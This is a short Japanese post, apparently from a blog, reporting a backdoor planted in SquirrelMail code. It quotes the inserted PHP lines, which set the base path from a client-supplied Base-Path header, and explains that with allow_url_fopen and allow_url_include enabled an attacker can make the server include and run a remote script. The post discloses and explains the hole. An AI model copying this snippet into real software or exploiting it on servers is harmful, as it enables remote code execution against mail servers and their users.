なぜかsquirｒelmail-develのメールがひどく遅延していて、14日のメールが今ごろ届いています。(^^;

その中にこの件のメールがありました。

以下のようなコードが仕込まれていたそうです。


/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}


リモートからリクエストにbase-pathを送り込むと、PHPの$_SERVER['HTTP_BASE_PATH']にセットされます。

allow_url_fopenとallow_url_includeがOnになっていると、base-pathに攻撃者が用意したurlを書き込んだリクエストを送ると、SquirrelMailは外部にあるスクリプトを読み込んで実行してしまうということですね。